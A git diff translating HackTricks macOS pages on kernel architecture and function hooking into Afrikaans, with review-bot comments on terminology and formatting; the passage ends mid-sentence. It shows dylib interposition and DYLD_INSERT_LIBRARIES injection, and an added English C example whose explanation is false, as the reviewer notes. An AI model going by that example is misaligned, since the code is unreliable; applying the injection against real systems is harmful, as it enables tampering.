[**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
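Review bot: `+In macOS **kan programme en binnerwerke toestemmings hê**` translates "binaries" as "binnerwerke" (innards); elsewhere in this patch the same word is rendered "binêre lêers" (see the MDM page heading `+## Instrumentering van Stelselbinêre Lêers wat met DEP Interageer`), so use "binêre lêers" here too. The `@@ -108,33 +108,32 @@` hunk also drops the blank line before `+## Verwysings` (the lone `-` line ahead of `-## References`), an unrelated whitespace change in a translation-only commit. In the final `@@ -144,29 +143,29 @@` hunk the footer keeps `[**SUBSCRIPTION PLANS**]` in English, and the HackenProof block says `real-time nuus en insigte` and `foutbeloningsjagters`, neither of which matches the wording chosen for the same blocks at the top of this file; settle on one rendering and apply it to both copies.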
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md index f8cd86d65..aaa96307b 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md @@ -1,57 +1,57 @@ -# macOS Kernel & System Extensions +# macOS Kernel & Stelseluitbreidings
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
## XNU Kernel -The **core of macOS is XNU**, which stands for "X is Not Unix". This kernel is fundamentally composed of the **Mach microkerne**l (to be discussed later), **and** elements from Berkeley Software Distribution (**BSD**). XNU also provides a platform for **kernel drivers via a system called the I/O Kit**. The XNU kernel is part of the Darwin open source project, which means **its source code is freely accessible**. +Die **kern van macOS is XNU**, wat staan vir "X is Not Unix". Hierdie kern bestaan ​​hoofsaaklik uit die **Mach-mikrokern** (wat later bespreek sal word), **en** elemente van die Berkeley Software Distribution (**BSD**). XNU bied ook 'n platform vir **kernbestuurders deur 'n stelsel genaamd die I/O Kit**. Die XNU-kern is deel van die Darwin oopbronprojek, wat beteken dat **sy bronkode vrylik toeganklik is**. -From a perspective of a security researcher or a Unix developer, **macOS** can feel quite **similar** to a **FreeBSD** system with an elegant GUI and a host of custom applications. Most applications developed for BSD will compile and run on macOS without needing modifications, as the command-line tools familiar to Unix users are all present in macOS. However, because the XNU kernel incorporates Mach, there are some significant differences between a traditional Unix-like system and macOS, and these differences might cause potential issues or provide unique advantages. +Vanuit die oogpunt van 'n sekuriteitsnavorsers of 'n Unix-ontwikkelaar, kan **macOS** redelik **soortgelyk** voel aan 'n **FreeBSD**-sisteem met 'n elegante GUI en 'n verskeidenheid aangepaste toepassings. Die meeste toepassings wat vir BSD ontwikkel is, sal op macOS kompilasie en uitvoering sonder om wysigings nodig te hê, aangesien die opdraggelynhulpmiddels wat bekend is aan Unix-gebruikers almal teenwoordig is in macOS. 
Tog, omdat die XNU-kern Mach inkorporeer, is daar 'n paar belangrike verskille tussen 'n tradisionele Unix-soortgelyke stelsel en macOS, en hierdie verskille kan potensiële probleme veroorsaak of unieke voordele bied. -Open source version of XNU: [https://opensource.apple.com/source/xnu/](https://opensource.apple.com/source/xnu/) +Oopbronweergawe van XNU: [https://opensource.apple.com/source/xnu/](https://opensource.apple.com/source/xnu/) ### Mach -Mach is a **microkernel** designed to be **UNIX-compatible**. One of its key design principles was to **minimize** the amount of **code** running in the **kernel** space and instead allow many typical kernel functions, such as file system, networking, and I/O, to **run as user-level tasks**. +Mach is 'n **mikrokern** wat ontwerp is om **UNIX-verenigbaar** te wees. Een van sy sleutelontwerpbeginsels was om die hoeveelheid **kode** wat in die **kern**-ruimte uitgevoer word, te **minimeer** en eerder baie tipiese kernfunksies, soos lêersisteem, netwerk en I/O, as **gebruikervlak-take** te laat uitvoer. -In XNU, Mach is **responsible for many of the critical low-level operations** a kernel typically handles, such as processor scheduling, multitasking, and virtual memory management. +In XNU is Mach **verantwoordelik vir baie van die kritieke lae-vlak-operasies** wat 'n kern tipies hanteer, soos prosessorbeplanning, multitasking en virtuele geheuebestuur. ### BSD -The XNU **kernel** also **incorporates** a significant amount of code derived from the **FreeBSD** project. This code **runs as part of the kernel along with Mach**, in the same address space. However, the FreeBSD code within XNU may differ substantially from the original FreeBSD code because modifications were required to ensure its compatibility with Mach. FreeBSD contributes to many kernel operations including: +Die XNU **kern** inkorporeer ook 'n aansienlike hoeveelheid kode wat afgelei is van die **FreeBSD**-projek. 
Hierdie kode **loop as deel van die kern saam met Mach** in dieselfde adresruimte. Die FreeBSD-kode binne XNU kan egter aansienlik verskil van die oorspronklike FreeBSD-kode omdat wysigings nodig was om die verenigbaarheid met Mach te verseker. FreeBSD dra by tot baie kernoperasies, insluitend: -* Process management -* Signal handling -* Basic security mechanisms, including user and group management -* System call infrastructure -* TCP/IP stack and sockets -* Firewall and packet filtering +* Prosesbestuur +* Seinhantering +* Basiese sekuriteitsmeganismes, insluitend gebruiker- en groepbestuur +* Stelseloproep-infrastruktuur +* TCP/IP-stapel en sokkels +* Brandmuur en pakkiefiltering -Understanding the interaction between BSD and Mach can be complex, due to their different conceptual frameworks. For instance, BSD uses processes as its fundamental executing unit, while Mach operates based on threads. This discrepancy is reconciled in XNU by **associating each BSD process with a Mach task** that contains exactly one Mach thread. When BSD's fork() system call is used, the BSD code within the kernel uses Mach functions to create a task and a thread structure. +Die begrip van die interaksie tussen BSD en Mach kan kompleks wees as gevolg van hul verskillende konseptuele raamwerke. Byvoorbeeld, BSD gebruik prosesse as sy fundamentele uitvoerende eenheid, terwyl Mach op drade gebaseer is. Hierdie teenstrydigheid word in XNU verreken deur **elke BSD-proses te koppel aan 'n Mach-taak** wat presies een Mach-draad bevat. Wanneer BSD se fork()-stelseloproep gebruik word, gebruik die BSD-kode binne die kern Mach-funksies om 'n taak- en draadstruktuur te skep. -Moreover, **Mach and BSD each maintain different security models**: **Mach's** security model is based on **port rights**, whereas BSD's security model operates based on **process ownership**. Disparities between these two models have occasionally resulted in local privilege-escalation vulnerabilities. 
Apart from typical system calls, there are also **Mach traps that allow user-space programs to interact with the kernel**. These different elements together form the multifaceted, hybrid architecture of the macOS kernel. +Verder **handhaaf Mach en BSD elk 'n ander sekuriteitsmodel**: **Mach se** sekuriteitsmodel is gebaseer op **poortregte**, terwyl BSD se sekuriteitsmodel gebaseer is op **proses-eienaarskap**. Verskille tussen hierdie twee modelle het soms gelei tot plaaslike voorreg-escalatiekwesbaarhede. Afgesien van tipiese stelseloproepe, is daar ook **Mach-valstrikke wat gebruikersruimteprogramme in staat stel om met die kern te kommunikeer**. Hierdie verskillende elemente vorm saam die veelsydige, hibriede argitektuur van die macOS-kern. -### I/O Kit - Drivers +### I/O Kit - Bestuurders -The I/O Kit is an open-source, object-oriented **device-driver framework** in the XNU kernel, handles **dynamically loaded device drivers**. It allows modular code to be added to the kernel on-the-fly, supporting diverse hardware. +Die I/O Kit is 'n oopbron, objekgeoriënteerde **toestelbestuurder-raamwerk** in die XNU-kern, wat **dinamies gelaai toestelbestuurders** hanteer. Dit maak dit moontlik om modulêre kode op die vlieg by die kern te voeg, wat diverse hardeware ondersteun. {% content-ref url="macos-iokit.md" %} [macos-iokit.md](macos-iokit.md) {% endcontent-ref %} -### IPC - Inter Process Communication +### IPC - Interproseskommunikasie {% content-ref url="macos-ipc-inter-process-communication/" %} [macos-ipc-inter-process-communication](macos-ipc-inter-process-communication/) 
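Review bot: "Mach traps" has been rendered as "Mach-valstrikke" in the added paragraph on the two security models ("daar is ook **Mach-valstrikke** wat gebruikersruimteprogramme..."); "valstrik" is a snare, not the kernel-entry mechanism, and readers of the original will not recognise the term. Keep the technical term as "Mach traps" (or "Mach-trap-oproepe") as the English text does with `fork()` and the I/O Kit. Two grammar points in the same hunk: "Vanuit die oogpunt van 'n sekuriteitsnavorsers" mixes the indefinite article with a plural and should read "'n sekuriteitsnavorser"; and "sal op macOS kompilasie en uitvoering sonder om wysigings nodig te hê" uses nouns where the original has verbs ("will compile and run"), so "sal op macOS kompileer en uitvoer sonder wysigings" is what is meant.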
@@ -59,29 +59,28 @@ The I/O Kit is an open-source, object-oriented **device-driver framework** in th ### Kernelcache -The **kernelcache** is a **pre-compiled and pre-linked version of the XNU kernel**, along with essential device **drivers** and **kernel extensions**. It's stored in a **compressed** format and gets decompressed into memory during the boot-up process. The kernelcache facilitates a **faster boot time** by having a ready-to-run version of the kernel and crucial drivers available, reducing the time and resources that would otherwise be spent on dynamically loading and linking these components at boot time. +Die **kernelcache** is 'n **vooraf gekompileerde en vooraf gekoppelde weergawe van die XNU-kern**, tesame met noodsaaklike toestel-**bestuurders** en **kernuitbreidings**. Dit word in 'n **gekomprimeerde** formaat gestoor en word tydens die opstartproses in die geheue gedekomprimeer. Die kernelcache fasiliteer 'n **vinniger opstarttyd** deur 'n gereed-om-uitgevoerde weergawe van die kern en belangrike bestuurders beskikbaar te hê, wat die tyd en hulpbronne verminder wat andersins sou word spandeer op die dinamiese laai en koppeling van hierdie komponente tydens die opstartproses. -In iOS it's located in **`/System/Library/Caches/com.apple.kernelcaches/kernelcache`** in macOS you can find it with **`find / -name kernelcache 2>/dev/null`** +In iOS is dit geleë in **`/System/Library/Caches/com.apple.kernelcaches/kernelcache`** in macOS kan jy dit vind met **`find / -name kernelcache 2>/dev/null`** #### IMG4 -The IMG4 file format is a container format used by Apple in its iOS and macOS devices for securely **storing and verifying firmware** components (like **kernelcache**). The IMG4 format includes a header and several tags which encapsulate different pieces of data including the actual payload (like a kernel or bootloader), a signature, and a set of manifest properties. 
The format supports cryptographic verification, allowing the device to confirm the authenticity and integrity of the firmware component before executing it. +Die IMG4-lêerformaat is 'n houerformaat wat deur Apple in sy iOS- en macOS-toestelle gebruik word om firmware-komponente (soos **kernelcache**) veilig te **stoor en te verifieer**. Die IMG4-formaat sluit 'n kop en verskeie etikette in wat verskillende stukke data insluit, insluitend die werklike nutslading (soos 'n kern of opstartlader), 'n handtekening en 'n stel manifesteienskappe. Die formaat ondersteun kriptografiese verifikasie, wat die toestel in staat stel om die egtheid en integriteit van die firmware-komponent te bevestig voordat dit uitgevoer word. -It's usually composed of the following components: +Dit bestaan ​​gewoonlik uit die volgende komponente: -* **Payload (IM4P)**: - * Often compressed (LZFSE4, LZSS, …) - * Optionally encrypted +* **Nutslading (IM4P)**: +* Dikwels saamgedruk (LZFSE4, LZSS, ...) +* Opsioneel versleutel * **Manifest (IM4M)**: - * Contains Signature - * Additional Key/Value dictionary -* **Restore Info (IM4R)**: - * Also known as APNonce - * Prevents replaying of some updates - * OPTIONAL: Usually this isn't found - -Decompress the Kernelcache: +* Bevat handtekening +* Addisionele Sleutel/Waarde-woordeboek +* **Herstelinfo (IM4R)**: +* Ook bekend as APNonce +* Voorkom dat sekere opdaterings herhaal word +* OPSIONEEL: Gewoonlik word dit nie gevind nie +Dekomprimeer die Kernelcache: ```bash # pyimg4 (https://github.com/m1stadev/PyIMG4) pyimg4 im4p extract -i kernelcache.release.iphone14 -o kernelcache.release.iphone14.e 
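Review bot: the nested IMG4 component list loses its structure in this hunk: the removed lines had the sub-items indented two spaces under each component (`  * Often compressed (LZFSE4, LZSS, …)`, `  * Contains Signature`, `  * Also known as APNonce`), but the added lines put them at top level (`+* Dikwels saamgedruk (LZFSE4, LZSS, ...)`, `+* Bevat handtekening`), so the three components and their properties now render as one flat list of eleven bullets. Restore the two-space indent on the sub-items. The blank line before "Decompress the Kernelcache:" and the one between that sentence and the ```bash fence were also dropped (`+Dekomprimeer die Kernelcache:` is immediately followed by the fence), which is a whitespace regression the translation should not introduce. Finally, "Nutslading" for "Payload (IM4P)" is an unusual coinage next to the untranslated "Manifest (IM4M)"; keeping "Payload" would be consistent with the other IMG4 names.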
@@ -89,17 +88,16 @@ pyimg4 im4p extract -i kernelcache.release.iphone14 -o kernelcache.release.iphon # img4tool (https://github.com/tihmstar/img4tool img4tool -e kernelcache.release.iphone14 -o kernelcache.release.iphone14.e ``` +#### Kernelcache Simbole -#### Kernelcache Symbols - -Sometime Apple releases **kernelcache** with **symbols**. You can download some firmwares with symbols by following links on [https://theapplewiki.com](https://theapplewiki.com/). +Soms versprei Apple **kernelcache** met **simbole**. Jy kan sommige firmwares met simbole aflaai deur die skakels op [https://theapplewiki.com](https://theapplewiki.com/) te volg. ### IPSW -These are Apple **firmwares** you can download from [**https://ipsw.me/**](https://ipsw.me/). Among other files it will contains the **kernelcache**.\ -To **extract** the files you can just **unzip** it. +Dit is Apple **firmwares** wat jy kan aflaai vanaf [**https://ipsw.me/**](https://ipsw.me/). Onder andere lêers bevat dit die **kernelcache**.\ +Om die lêers uit te pak, kan jy dit net **onttrek**. -After extracting the firmware you will get a file like: **`kernelcache.release.iphone14`**. It's in **IMG4** format, you can extract the interesting info with: +Nadat jy die firmware uitgepak het, sal jy 'n lêer soos hierdie kry: **`kernelcache.release.iphone14`**. Dit is in **IMG4**-formaat, jy kan die interessante inligting uittrek met: * [**pyimg4**](https://github.com/m1stadev/PyIMG4) 
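Review bot: the instruction "To **extract** the files you can just **unzip** it" loses the concrete action in translation: the added line reads "Om die lêers uit te pak, kan jy dit net **onttrek**", which just says "to unpack, extract", and the reader no longer learns that an IPSW is a zip archive that `unzip` opens. Suggest "kan jy dit net met `unzip` uitpak" so the tool name survives. Separately, the blank line between the closing ``` fence and the heading was removed, so `+#### Kernelcache Simbole` now abuts the fence directly; restore the blank line as in the removed `-#### Kernelcache Symbols` block.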
@@ -110,15 +108,12 @@ pyimg4 im4p extract -i kernelcache.release.iphone14 -o kernelcache.release.iphon {% endcode %} * [**img4tool**](https://github.com/tihmstar/img4tool) - ```bash img4tool -e kernelcache.release.iphone14 -o kernelcache.release.iphone14.e ``` +Jy kan die uitgepakte kernelcache vir simbole nagaan met: **`nm -a kernelcache.release.iphone14.e | wc -l`** -You can check the extracted kernelcache for symbols with: **`nm -a kernelcache.release.iphone14.e | wc -l`** - -With this we can now **extract all the extensions** or the **one you are insterested in:** - +Met hierdie kan ons nou **alle uitbreidings onttrek** of die **een waarin jy belangstel:** ```bash # List all extensions kextex -l kernelcache.release.iphone14.e 
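Review bot: this hunk removes the blank line between the `* [**img4tool**](...)` list item and the following ```bash fence, and the blank line between "Met hierdie kan ons nou **alle uitbreidings onttrek** ... belangstel:**" and its ```bash fence. In GitBook markdown a fence glued to a list item is absorbed into the item (or rendered as literal text), and the second case turns the lead-in sentence and the code block into one paragraph. The Afrikaans text itself is fine; only the whitespace needs reverting, so the `-` and `+` lines should differ by translation alone.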
@@ -131,38 +126,37 @@ kextex_all kernelcache.release.iphone14.e # Check the extension for symbols nm -a binaries/com.apple.security.sandbox | wc -l ``` +## macOS Kerneluitbreidings -## macOS Kernel Extensions - -macOS is **super restrictive to load Kernel Extensions** (.kext) because of the high privileges that code will run with. Actually, by default is virtually impossible (unless a bypass is found). +macOS is **baie beperkend om Kerneluitbreidings** (.kext) te laai as gevolg van die hoë bevoegdhede waarmee kode sal loop. In werklikheid is dit by verstek feitlik onmoontlik (behalwe as 'n omweg gevind word). {% content-ref url="macos-kernel-extensions.md" %} [macos-kernel-extensions.md](macos-kernel-extensions.md) {% endcontent-ref %} -### macOS System Extensions +### macOS-stelseluitbreidings -Instead of using Kernel Extensions macOS created the System Extensions, which offers in user level APIs to interact with the kernel. This way, developers can avoid to use kernel extensions. +In plaas daarvan om Kerneluitbreidings te gebruik, het macOS die Stelseluitbreidings geskep, wat gebruikersvlak-API's bied om met die kernel te kommunikeer. Op hierdie manier kan ontwikkelaars voorkom om kerneluitbreidings te gebruik. {% content-ref url="macos-system-extensions.md" %} [macos-system-extensions.md](macos-system-extensions.md) {% endcontent-ref %} -## References +## Verwysings * [**The Mac Hacker's Handbook**](https://www.amazon.com/-/es/Charlie-Miller-ebook-dp-B004U7MUMU/dp/B004U7MUMU/ref=mt\_other?\_encoding=UTF8\&me=\&qid=) * [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
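Review bot: terminology is inconsistent within this one file: the Kernelcache paragraph earlier in the diff uses "kern" and "kernuitbreidings", while this hunk uses "Kerneluitbreidings", "kernel" and "kerneluitbreidings" ("om met die kernel te kommunikeer ... voorkom om kerneluitbreidings te gebruik"). Pick one form (the earlier "kern"/"kernuitbreidings" or the untranslated "kernel") and apply it throughout. The boilerplate footer is also translated differently from the header block at the top of the same file: "github-opslag" here versus "github-repos" there, "HackTricks-uitrusting" versus "HackTricks swag", "NFT's" versus "NFTs". Since this footer is repeated in every page, the workflow should emit one canonical translation rather than re-translating it per occurrence. Lastly `+## macOS Kerneluitbreidings` sits directly after the closing ``` fence with the blank line removed; restore it.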
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md index 6746f852b..d6c9e898f 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md @@ -1,24 +1,24 @@ -# macOS Function Hooking +# macOS Funksie Hooking
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Function Interposing +## Funksie Interposing -Create a **dylib** with an **`__interpose`** section (or a section flagged with **`S_INTERPOSING`**) containing tuples of **function pointers** that refer to the **original** and the **replacement** functions. +Skep 'n **dylib** met 'n **`__interpose`**-afdeling (of 'n afdeling wat gemerk is met **`S_INTERPOSING`**) wat tuples van **funksie-aanwysers** bevat wat verwys na die **oorspronklike** en die **vervangings**-funksies. -Then, **inject** the dylib with **`DYLD_INSERT_LIBRARIES`** (the interposing needs occur before the main app loads). Obviously the [**restrictions** applied to the use of **`DYLD_INSERT_LIBRARIES`** applies here also](../macos-proces-abuse/macos-library-injection/#check-restrictions). +Injecteer dan die dylib met **`DYLD_INSERT_LIBRARIES`** (die interposing moet plaasvind voordat die hoofprogram laai). Uiteraard geld die [**beperkings** wat op die gebruik van **`DYLD_INSERT_LIBRARIES`** van toepassing is, ook hier](../macos-proces-abuse/macos-library-injection/#check-restrictions). ### Interpose printf @@ -31,13 +31,13 @@ Then, **inject** the dylib with **`DYLD_INSERT_LIBRARIES`** (the interposing nee #include int my_printf(const char *format, ...) { - //va_list args; - //va_start(args, format); - //int ret = vprintf(format, args); - //va_end(args); +//va_list args; +//va_start(args, format); +//int ret = vprintf(format, args); +//va_end(args); - int ret = printf("Hello from interpose\n"); - return ret; +int ret = printf("Hello from interpose\n"); +return ret; } __attribute__((used)) static struct { const void *replacement; const void *replacee; } _interpose_printf 
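Review bot: hunk @@ -31,13 +31,13 @@ strips the leading indentation inside the `my_printf` body: the removed lines are indented four spaces (`-    int ret = printf("Hello from interpose\n");`), the added lines are flush-left (`+int ret = printf("Hello from interpose\n");`). That is a whitespace-only change to code in a translation PR, and it recurs in every fenced block later in this file. Fenced code blocks should be passed through the translation step untouched; please revert the indentation changes. In the prose above it, "Injecteer dan die dylib" is the Dutch verb form; Afrikaans would be "Spuit dan die dylib in" or simply keep "Inject".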
@@ -52,13 +52,75 @@ __attribute__ ((section ("__DATA,__interpose"))) = { (const void *)(unsigned lon #include int main() { - printf("Hello World!\n"); - return 0; +printf("Hello World!\n"); +return 0; } ``` -{% endtab %} - {% tab title="interpose2.c" %} + +```c +#include +#include +#include + +// Function pointer type for the original function +typedef int (*orig_open_type)(const char *pathname, int flags); + +// Function pointer type for the interposed function +typedef int (*interposed_open_type)(const char *pathname, int flags); + +// Define the interposed function +int interposed_open(const char *pathname, int flags) { + printf("Interposed open called with pathname: %s\n", pathname); + + // Get the address of the original function + orig_open_type orig_open = (orig_open_type)dlsym(RTLD_NEXT, "open"); + + // Call the original function + int result = orig_open(pathname, flags); + + return result; +} + +// Define the constructor function +__attribute__((constructor)) +void my_constructor() { + printf("Constructor called\n"); + + // Get the address of the interposed function + interposed_open_type interposed_open = (interposed_open_type)dlsym(RTLD_NEXT, "open"); + + // Get the address of the original function + orig_open_type orig_open = (orig_open_type)dlsym(RTLD_NEXT, "open"); + + // Call the interposed function + interposed_open("file.txt", 0); + + // Call the original function + orig_open("file.txt", 0); +} +``` + +This code demonstrates how to use function hooking in macOS using the `interpose` mechanism. The `interpose` mechanism allows you to intercept and replace function calls at runtime. + +In this example, we define an interposed function called `interposed_open` that will be called instead of the original `open` function. The `interposed_open` function simply prints the pathname argument and then calls the original `open` function. + +To use the `interpose` mechanism, we need to define a constructor function called `my_constructor`. 
The constructor function is automatically called when the shared library is loaded. In the constructor function, we get the addresses of both the interposed and original `open` functions using `dlsym`. We then call the interposed function to demonstrate that it is being called instead of the original function. Finally, we call the original function to show that we can still call it if needed. + +To compile and use this code, you can use the following commands: + +```bash +gcc -shared -o interpose.dylib interpose.c -ldl +DYLD_INSERT_LIBRARIES=./interpose.dylib ./program +``` + +Replace `program` with the name of the program you want to run with the interposed function. + +When you run the program, you should see the output from the interposed function followed by the output from the original function. + +This technique can be useful for various purposes, such as logging function calls, modifying function behavior, or implementing security measures. + +{% endtab %} ```c // Just another way to define an interpose // gcc -dynamiclib interpose2.c -o interpose2.dylib 
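Review bot: this hunk breaks the `{% tabs %}` nesting and should not be merged as is. It removes the `{% endtab %}` that closed the interpose.c tab, keeps `{% tab title="interpose2.c" %}`, and adds a new `{% endtab %}` after the inserted English prose, before the original `// Just another way to define an interpose` block. The result is: tab interpose.c opened, tab interpose2.c opened inside it, `{% endtab %}`, the real interpose2.c code outside any tab, then the original `{% endtab %}` and `{% endtabs %}`, i.e. one tab never closed and one closed twice. The inserted material is also not a translation: a new C block and three paragraphs of English explanation appear only on `+` lines with nothing removed. The code does not demonstrate what its text claims: it never declares an `__interpose` section entry, so nothing routes the program's `open` calls to `interposed_open`; inside `my_constructor` the local `interposed_open_type interposed_open = ... dlsym(RTLD_NEXT, "open")` shadows the function of the same name and is assigned the real `open`, so "Call the interposed function" actually calls the original `open` twice; and `-ldl` is unnecessary on macOS. Drop the inserted block and prose, and restore `{% endtab %}` to its original position after the interpose.c code.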
@@ -66,25 +128,24 @@ int main() { #include #define DYLD_INTERPOSE(_replacement, _replacee) \ - __attribute__((used)) static struct { \ - const void* replacement; \ - const void* replacee; \ - } _interpose_##_replacee __attribute__ ((section("__DATA, __interpose"))) = { \ - (const void*) (unsigned long) &_replacement, \ - (const void*) (unsigned long) &_replacee \ - }; +__attribute__((used)) static struct { \ +const void* replacement; \ +const void* replacee; \ +} _interpose_##_replacee __attribute__ ((section("__DATA, __interpose"))) = { \ +(const void*) (unsigned long) &_replacement, \ +(const void*) (unsigned long) &_replacee \ +}; int my_printf(const char *format, ...) { - int ret = printf("Hello from interpose\n"); - return ret; +int ret = printf("Hello from interpose\n"); +return ret; } DYLD_INTERPOSE(my_printf,printf); ``` {% endtab %} {% endtabs %} - ```bash DYLD_INSERT_LIBRARIES=./interpose.dylib ./hello Hello from interpose 
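Review bot: the `DYLD_INTERPOSE` macro loses the indentation of its continuation lines in this hunk (`-    __attribute__((used)) static struct { \` becomes `+__attribute__((used)) static struct { \`, and likewise for the struct members and initialisers). It still compiles, because the backslash continuations are intact, but the macro body is now unreadable, and the change has nothing to do with translation. Also the blank line between `{% endtabs %}` and the following ```bash fence was removed. Revert the whitespace changes so the hunk contains only the intended text changes (of which there are none in this region).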
@@ -92,25 +153,23 @@ Hello from interpose DYLD_INSERT_LIBRARIES=./interpose2.dylib ./hello Hello from interpose ``` +## Metode Swizzling -## Method Swizzling +In ObjectiveC word 'n metode soos volg geroep: **`[myClassInstance nameOfTheMethodFirstParam:param1 secondParam:param2]`** -In ObjectiveC this is how a method is called like: **`[myClassInstance nameOfTheMethodFirstParam:param1 secondParam:param2]`** +Die **objek**, die **metode** en die **parameters** is nodig. En wanneer 'n metode geroep word, word 'n **boodskap gestuur** deur die gebruik van die funksie **`objc_msgSend`**: `int i = ((int (*)(id, SEL, NSString *, NSString *))objc_msgSend)(someObject, @selector(method1p1:p2:), value1, value2);` -It's needed the **object**, the **method** and the **params**. And when a method is called a **msg is sent** using the function **`objc_msgSend`**: `int i = ((int (*)(id, SEL, NSString *, NSString *))objc_msgSend)(someObject, @selector(method1p1:p2:), value1, value2);` +Die objek is **`someObject`**, die metode is **`@selector(method1p1:p2:)`** en die argumente is **value1**, **value2**. -The object is **`someObject`**, the method is **`@selector(method1p1:p2:)`** and the arguments are **value1**, **value2**. - -Following the object structures, it's possible to reach an **array of methods** where the **names** and **pointers** to the method code are **located**. +Deur die objekstrukture te 